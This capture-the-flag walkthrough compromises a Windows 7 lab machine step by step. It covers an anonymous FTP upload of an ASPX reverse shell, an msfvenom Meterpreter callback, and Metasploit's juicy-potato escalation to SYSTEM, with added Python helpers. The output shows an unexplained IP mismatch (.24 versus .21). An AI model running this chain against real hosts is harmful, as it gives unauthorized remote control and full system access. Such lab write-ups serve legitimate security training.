┌──(root㉿kali)-[/home/kali/hmv/ysnmrtksk]
└─# fscan -h 192.168.56.21
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.56.21:135 open
192.168.56.21:21 open
192.168.56.21:139 open
192.168.56.21:445 open
192.168.56.21:80 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo
[*]192.168.56.21
[->]quoted-PC
[->]192.168.56.21
[*] OsInfo 192.168.56.21 (Windows 7 Professional 7601 Service Pack 1)
[+] ftp 192.168.56.21:21:anonymous
[->]aspnet_client
[->]iisstart.htm
[->]welcome.png
[*] WebTitle http://192.168.56.21 code:200 len:689 title:IIS7
[*] completed 5/5
[*] scan finished, elapsed: 1.434643461s
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# ftp 192.168.56.21
Connected to 192.168.56.21.
220 Microsoft FTP Service
Name (192.168.56.21:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49179|)
125 Data connection already open; Transfer starting.
10-05-24 11:16AM <DIR> aspnet_client
10-04-24 11:27PM 689 iisstart.htm
10-04-24 11:27PM 184946 welcome.png
226 Transfer complete.
ftp> put pass.asp
local: pass.asp remote: pass.asp
229 Entering Extended Passive Mode (|||49181|)
125 Data connection already open; Transfer starting.
100% |******************************************************| 27 432.24 KiB/s --:-- ETA
The FTP root is the IIS web root: the same three entries (aspnet_client, iisstart.htm, welcome.png) that fscan found under http://192.168.56.21. Anything anonymous FTP writes there is served by IIS, and the aspnet_client directory indicates ASP.NET is installed, so an uploaded .aspx will execute. Next, an ASPX reverse shell:
https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
Change the IP and listener port in it to our own, put it up the same way, start nc, then request the page over HTTP to pop the shell.
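As an added example (not from the original write-up), the condition that makes this box fall, an anonymous FTP root that is also the IIS web root, can be confirmed with one probe instead of by eye: upload a random marker over FTP, fetch it over HTTP, delete it. The host and URL are the lab values above; the marker format, the injected upload/fetch/delete callables and the verdict strings are my own.

```python
"""Probe whether an anonymous-writable FTP root is also the IIS web root.

Added example, not code from the write-up.  Assumptions: anonymous FTP
login, plain HTTP on the same host, and that the web server serves the
FTP root verbatim (the verdict tells you whether that holds).
"""
import io
import ftplib
import secrets
import sys
import urllib.error
import urllib.request


def make_marker():
    """Random, unambiguous marker so the probe never overwrites a real file."""
    token = secrets.token_hex(8)
    return f"probe_{token}.txt", f"ftp-webroot-probe {token}\n".encode()


def check_ftp_webroot(upload, fetch, delete):
    """Decide the verdict using three injected callables:
         upload(name, data) -> stores the file over FTP (raises on failure)
         fetch(name)        -> bytes the web server returns, or None on 404
         delete(name)       -> removes the file over FTP
    Returns "no_write", "write_only" or "write_and_serve".
    """
    name, data = make_marker()
    try:
        upload(name, data)
    except ftplib.all_errors:          # 550 permission denied, socket errors, ...
        return "no_write"
    try:
        body = fetch(name)
    finally:
        # Always clean up: a stray probe file is evidence left on the target.
        try:
            delete(name)
        except ftplib.all_errors:
            pass
    if body is not None and body.strip() == data.strip():
        return "write_and_serve"   # FTP write == code execution via IIS
    return "write_only"            # writable, but not reachable over HTTP


def live_clients(host, http_base):
    """Real FTP/HTTP callables for check_ftp_webroot against a lab host."""
    ftp = ftplib.FTP(host, timeout=10)
    ftp.login()  # anonymous, exactly as in the write-up

    def upload(name, data):
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))

    def fetch(name):
        try:
            with urllib.request.urlopen(f"{http_base}/{name}", timeout=10) as r:
                return r.read()
        except urllib.error.HTTPError:
            return None

    def delete(name):
        ftp.delete(name)

    return upload, fetch, delete


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.56.21"
    print(check_ftp_webroot(*live_clients(target, f"http://{target}")))
```

`write_and_serve` is the result that turns an FTP misconfiguration into remote code execution as the application pool identity; `write_only` still warrants a finding (arbitrary file write), just not this chain. The decision logic takes injected callables so it can be exercised without a target.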
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# ftp 192.168.56.21
Connected to 192.168.56.21.
220 Microsoft FTP Service
Name (192.168.56.21:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49185|)
125 Data connection already open; Transfer starting.
100% |******************************************************| 16394 87.34 MiB/s --:-- ETA
226 Transfer complete.
16394 bytes sent in 00:00 (18.90 MiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.56.6] from (UNKNOWN) [192.168.56.21] 49186
Spawn Shell...
Microsoft Windows [Sürüm 6.1.7601]
Telif Hakkı (c) 2009 Microsoft Corporation. Tüm hakları saklıdır.
c:\windows\system32\inetsrv>hostname
hostname
quoted-PC
c:\windows\system32\inetsrv>
We escalate with msf. First hand the shell over to msf: generate a Meterpreter reverse shell with msfvenom.
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.6 lport=7788 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Upload the payload to the target over the same anonymous FTP:
┌──(root㉿kali)-[/home/kali/hmv/quoted]
└─# ftp 192.168.56.21
Connected to 192.168.56.21.
220 Microsoft FTP Service
Name (192.168.56.21:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.exe
local: shell.exe remote: shell.exe
229 Entering Extended Passive Mode (|||49191|)
125 Data connection already open; Transfer starting.
100% |***********************************************| 74160 48.84 MiB/s --:-- ETA
226 Transfer complete.
74160 bytes sent in 00:00 (38.22 MiB/s)
Start the msf handler, then run shell.exe from the nc shell we already have (that command is not shown in the transcript; the new session's working directory is c:\Windows\Tasks, a directory normal users can write to, so the binary was evidently copied there first):
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.6
set lport 7788
run
meterpreter > shell
Process 2040 created.
Channel 3 created.
Microsoft Windows [Sürüm 6.1.7601]
Telif Hakkı (c) 2009 Microsoft Corporation. Tüm hakları saklıdır.
c:\Windows\Tasks>whoami /priv
whoami /priv
AYRICALIK BİLGİLERİ
----------------------

Ayrıcalık Adı                 Açıklama                                                 Durum
============================= ======================================================== ==========
SeAssignPrimaryTokenPrivilege İşlem düzeyi belirtecini değiştir                        Devre Dışı
SeIncreaseQuotaPrivilege      İşlem için bellek kotaları ayarla                        Devre Dışı
SeSecurityPrivilege           Denetimi ve güvenlik günlüğünü yönet                     Devre Dışı
SeShutdownPrivilege           Sistemi kapat                                            Devre Dışı
SeAuditPrivilege              Güvenlik denetimleri oluştur                             Devre Dışı
SeChangeNotifyPrivilege       Çapraz geçiş denetimini atla                             Etkin
SeUndockPrivilege             Bilgisayarı takma biriminden çıkar                       Devre Dışı
SeImpersonatePrivilege        Kimlik doğrulamasından sonra istemcinin özelliklerini al Etkin
SeCreateGlobalPrivilege       Genel nesneler oluştur                                   Etkin
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır                             Devre Dışı
SeTimeZonePrivilege           Saat dilimini değiştir                                   Devre Dışı
The whoami output is in Turkish: "Etkin" means Enabled and "Devre Dışı" means Disabled. The privilege that matters is SeImpersonatePrivilege, which is Enabled (SeIncreaseWorkingSetPrivilege is Disabled here and is of no use for escalation anyway). An application-pool identity holding SeImpersonatePrivilege on Windows 7 SP1 is the classic Potato scenario: JuicyPotato, GodPotato, or msf's ms16_075_reflection_juicy module (used below) will get SYSTEM. Background session 1 first; the original handler exited once that session opened, so port 7788 is free to reuse (otherwise pick another lport).
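Reading that table by eye is how the wrong privilege got picked out in the first place. As an added example (not from the write-up), the parser below reads `whoami /priv` output language-independently: privilege names are fixed English constants, only the description and state columns are localized. The sample table is constructed from the Turkish output above; the enabled/disabled word lists and the technique hints are my own and cover only the locales I am sure of.

```python
"""Parse `whoami /priv` in any locale and flag privileges that lead to SYSTEM.

Added example; the SAMPLE table is rebuilt from this write-up's Turkish
output, the locale word lists are an assumption (extend them as needed).
"""

# Localized state words.  Assumption: only these four locales are covered.
ENABLED_WORDS = {"Enabled", "Etkin", "Aktiviert", "已启用"}
DISABLED_WORDS = {"Disabled", "Devre Dışı", "Deaktiviert", "已禁用"}

# Enabled privileges with a well-known path to SYSTEM.
ESCALATION_HINTS = {
    "SeImpersonatePrivilege": "Potato family (JuicyPotato on Win7/2008-era hosts, GodPotato/PrintSpoofer on newer)",
    "SeAssignPrimaryTokenPrivilege": "Potato family (same as SeImpersonatePrivilege)",
    "SeBackupPrivilege": "copy SAM/SYSTEM hives, dump local hashes",
    "SeRestorePrivilege": "overwrite service binaries or registry keys",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeTakeOwnershipPrivilege": "take ownership of protected files and services",
    "SeLoadDriverPrivilege": "load a vulnerable signed driver",
}

# Constructed sample: the rows from the box, laid out exactly as whoami does
# it (single space between columns, each column as wide as its longest cell).
_ROWS = [
    ("SeAssignPrimaryTokenPrivilege", "İşlem düzeyi belirtecini değiştir", "Devre Dışı"),
    ("SeIncreaseQuotaPrivilege", "İşlem için bellek kotaları ayarla", "Devre Dışı"),
    ("SeSecurityPrivilege", "Denetimi ve güvenlik günlüğünü yönet", "Devre Dışı"),
    ("SeShutdownPrivilege", "Sistemi kapat", "Devre Dışı"),
    ("SeAuditPrivilege", "Güvenlik denetimleri oluştur", "Devre Dışı"),
    ("SeChangeNotifyPrivilege", "Çapraz geçiş denetimini atla", "Etkin"),
    ("SeUndockPrivilege", "Bilgisayarı takma biriminden çıkar", "Devre Dışı"),
    ("SeImpersonatePrivilege", "Kimlik doğrulamasından sonra istemcinin özelliklerini al", "Etkin"),
    ("SeCreateGlobalPrivilege", "Genel nesneler oluştur", "Etkin"),
    ("SeIncreaseWorkingSetPrivilege", "İşlem çalışma kümesini artır", "Devre Dışı"),
    ("SeTimeZonePrivilege", "Saat dilimini değiştir", "Devre Dışı"),
]
_W1 = max(len(r[0]) for r in _ROWS)
_W2 = max(len(r[1]) for r in _ROWS)
SAMPLE = "\n".join(
    ["AYRICALIK BİLGİLERİ", "----------------------", "",
     f"{'Ayrıcalık Adı':<{_W1}} {'Açıklama':<{_W2}} Durum",
     f"{'=' * _W1} {'=' * _W2} {'=' * 10}"]
    + [f"{n:<{_W1}} {d:<{_W2}} {s}" for n, d, s in _ROWS]
) + "\n"


def _state_of(line):
    # Match the state at the end of the line rather than splitting on runs of
    # spaces: the longest description fills its column, leaving a single space
    # before the state (see the SeImpersonatePrivilege row), and "Devre Dışı"
    # itself contains a space.
    for word in ENABLED_WORDS:
        if line.endswith(word):
            return "enabled"
    for word in DISABLED_WORDS:
        if line.endswith(word):
            return "disabled"
    return "unknown"  # unrecognised locale: report it, never guess


def parse_whoami_priv(text):
    """Return {privilege_name: 'enabled' | 'disabled' | 'unknown'}."""
    privs = {}
    in_table = False
    for raw in text.splitlines():
        line = raw.rstrip()
        if not in_table:
            in_table = line.lstrip().startswith("=")   # rows start after ====
            continue
        if not line.strip():
            break
        name = line.split(None, 1)[0]
        if not name.startswith("Se"):
            continue
        privs[name] = _state_of(line)
    return privs


def escalation_candidates(privs):
    """Map the *enabled* privileges to the technique each one unlocks."""
    return {n: ESCALATION_HINTS[n] for n, s in privs.items()
            if s == "enabled" and n in ESCALATION_HINTS}


if __name__ == "__main__":
    for name, hint in escalation_candidates(parse_whoami_priv(SAMPLE)).items():
        print(f"{name}: {hint}")
```

On this box the only hit is SeImpersonatePrivilege, which is the Potato line of attack; an `unknown` state means the locale is not in the word lists and the row should be read manually rather than assumed disabled.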
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
set lhost 192.168.56.6
set lport 7788
run
msf6 exploit(windows/local/ms16_075_reflection_juicy) > run
[*] Started reverse TCP handler on 192.168.56.6:7788
[+] Target appears to be vulnerable (Windows 7 Service Pack 1)
[*] Launching notepad to host the exploit...
[+] Process 1240 launched.
[*] Reflectively injecting the exploit DLL into 1240...
[*] Injecting exploit into 1240...
[*] Exploit injected. Injecting exploit configuration into 1240...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176198 bytes) to 192.168.56.24
[*] Meterpreter session 2 opened (192.168.56.6:7788 -> 192.168.56.24:49194) at 2024-12-24 07:48:21 -0500
meterpreter > shell
Process 2240 created.
Channel 1 created.
Microsoft Windows [Sürüm 6.1.7601]
Telif Hakkı (c) 2009 Microsoft Corporation. Tüm hakları saklıdır.
C:\Windows\system32>whoami
whoami
nt authority\system
c:\Users\Administrator\Desktop>type root.txt
type root.txt
HMV{Elevated_Shell_Again}
c:\Users\quoted\Desktop>type user.txt
type user.txt
HMV{User_Flag_Obtained}